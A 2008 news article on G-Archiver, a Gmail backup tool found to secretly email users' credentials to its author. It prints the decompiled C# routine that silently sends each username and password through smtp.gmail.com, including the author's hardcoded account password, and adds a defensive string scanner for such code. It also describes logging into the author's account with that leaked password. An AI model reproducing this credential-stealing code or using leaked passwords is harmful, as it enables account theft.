Trojan steals Gmail passwords – and charges for it
by David M Williams
Wednesday, 12 March 2008
Nobody wants to lose their e-mail. So, for Gmail users, G-Archiver seemed like a great buy. For $US 29.95 this shareware app will make a duplicate of your Gmail account on your hard disk, for as many accounts as you like. What its users didn't count on was that G-Archiver's authors helped themselves to your Gmail username and password too.

The news was broken by excellent software developer and blogger, Jeff Atwood, who was in turn given the details by Dustin Brooks.

Brooks, it transpires, wanted to back up his Gmail account to a local drive. That's an understandable need; with mail storage in the order of gigabytes Gmail is a boon to hoarders and road warriors everywhere. You needn't even constrain yourself to e-mail: utilities exist to let you make use of all that lovely Google-provided disk space as a virtual hard drive. So, Brooks had a bunch of stuff in his Gmail account that he didn't want to lose.

He came across G-Archiver, a tool designed specifically for this very purpose which retails for $US 29.95 and offers a free trial. Brooks duly downloaded the software and gave it a spin. It prompted for his Gmail login details and he handed them over. G-Archiver performed its basic task but didn't quite do what Brooks would have liked.

Not to worry: being a computer programmer himself, he used Lutz Roeder's well-known Reflector software to do a bit of reverse engineering. Now, ordinarily trying to figure out someone else's proprietary source code is ethically dodgy, if not illegal. However, what Brooks discovered completely overshadowed any such concerns.

A Gmail user called John Terry, undoubtedly part of the G-Archiver development team if not the author himself, had hardcoded his own Gmail username and password into the source code. Brooks then noticed that every time a user ran G-Archiver and added a new Gmail account, the program e-mailed that account's credentials to John Terry's mailbox! This very code was clearly visible within the file SM.dll installed by the software:

using System;
using System.Net;
using System.Net.Mail;
using System.Text;

// Decompiled from SM.dll. The e-mail addresses in the original were obscured
// by this site's spam-bot protection; "<address elided>" marks each spot.
public static void CheckConnection(string a, string b) {
  try {
    MailMessage message = new MailMessage();
    message.To.Add("<address elided>");
    message.From = new MailAddress("<address elided>", "JTerry", Encoding.UTF8);
    message.Subject = "Account";
    message.SubjectEncoding = Encoding.UTF8;
    // The user's Gmail username and password, as passed in, become the body.
    message.Body = "Username: " + a;
    message.Body = message.Body + "\r\nPassword: " + b;
    message.BodyEncoding = Encoding.UTF8;
    message.IsBodyHtml = false;
    message.Priority = MailPriority.High;
    // Sent through Gmail itself, authenticating with the author's own account.
    SmtpClient client = new SmtpClient();
    client.Credentials = new NetworkCredential("<address elided>", "bilal482");
    client.Port = 0x24b;   // 587, Gmail's STARTTLS submission port
    client.Host = "smtp.gmail.com";
    client.EnableSsl = true;
    client.Send(message);
  }
  catch (Exception) { }   // any failure is silently swallowed
}


The key lines to note are the ones which begin with message.Body: here an e-mail message is built up from the literal strings "Username:" and "Password:" followed by the user's username and password as passed in to the function.

The code sends this message through Gmail to John Terry's own address (obscured on this page by the site's spam protection), logging in to that very account with the password bilal482.
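The behaviour above leaves a recognisable footprint in the compiled binary: an SMTP host name sitting next to literals that label a username and a password. The following scanner is an added example written for this article, not code from G-Archiver or from Brooks; it pulls printable strings out of a binary (both ASCII and the UTF-16LE form that .NET assemblies use for string literals) and flags that combination. The sample blob it scans is constructed here to mimic the literals in the decompiled routine; no real file is read.

```python
import re

# Indicators a reviewer would look for in an application that has no business
# sending mail on its own: an outbound mail host and credential-shaped labels.
INDICATORS = {
    "smtp_host": re.compile(r"\bsmtp\.[a-z0-9.-]+\.[a-z]{2,}\b", re.I),
    "credential_body": re.compile(r"\b(username|login|user)\s*:", re.I),
    "password_body": re.compile(r"\b(password|passwd|pwd)\s*:", re.I),
}


def extract_strings(blob: bytes, min_len: int = 6):
    """Yield printable runs from a binary, as ASCII and as UTF-16LE.

    .NET keeps user string literals as UTF-16LE in the assembly's #US heap,
    so an ASCII-only pass would miss exactly the literals shown in SM.dll.
    """
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    for m in ascii_re.finditer(blob):
        yield m.group().decode("ascii")
    for m in utf16_re.finditer(blob):
        yield m.group().decode("utf-16-le")


def scan(blob: bytes) -> dict:
    """Map each indicator name to the set of strings that triggered it."""
    hits: dict = {}
    for s in extract_strings(blob):
        for name, pattern in INDICATORS.items():
            if pattern.search(s):
                hits.setdefault(name, set()).add(s)
    return hits


def verdict(hits: dict) -> str:
    # A mail host plus a body that labels both a username and a password is
    # the shape of the G-Archiver routine; a mail host alone just merits a look.
    if {"smtp_host", "credential_body", "password_body"} <= set(hits):
        return "suspicious: credential-shaped mail body with embedded SMTP host"
    if "smtp_host" in hits:
        return "review: embedded SMTP host"
    return "clean"


def make_sample() -> bytes:
    """Constructed stand-in for a compiled assembly (not a real file).

    Each literal is stored UTF-16LE behind a one-byte length, roughly as the
    #US heap does, with junk bytes and one ASCII metadata name around them.
    """
    literals = ["smtp.gmail.com", "Username: ", "\r\nPassword: ", "Account", "JTerry"]
    body = b"MZ\x90\x00" + b"\x00" * 16
    for lit in literals:
        encoded = lit.encode("utf-16-le")
        body += bytes([len(encoded) + 1]) + encoded + b"\x00"
    body += b"CheckConnection\x00"
    return body


if __name__ == "__main__":
    sample_hits = scan(make_sample())
    for name, strings in sorted(sample_hits.items()):
        print(f"{name}: {sorted(strings)}")
    print(verdict(sample_hits))
```

Run against a real binary by replacing make_sample() with the file's bytes; the heuristic is deliberately coarse, so treat a "suspicious" result as a reason to open the assembly in a decompiler, as Brooks did, rather than as proof on its own.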

Brooks was concerned; after all, he'd just typed in his own login details! He fired up his web browser, called up Gmail and logged in to John Terry's account with the username and password contained within the bowels of G-Archiver. What he saw stunned him again.

Please read on to find out what happened.
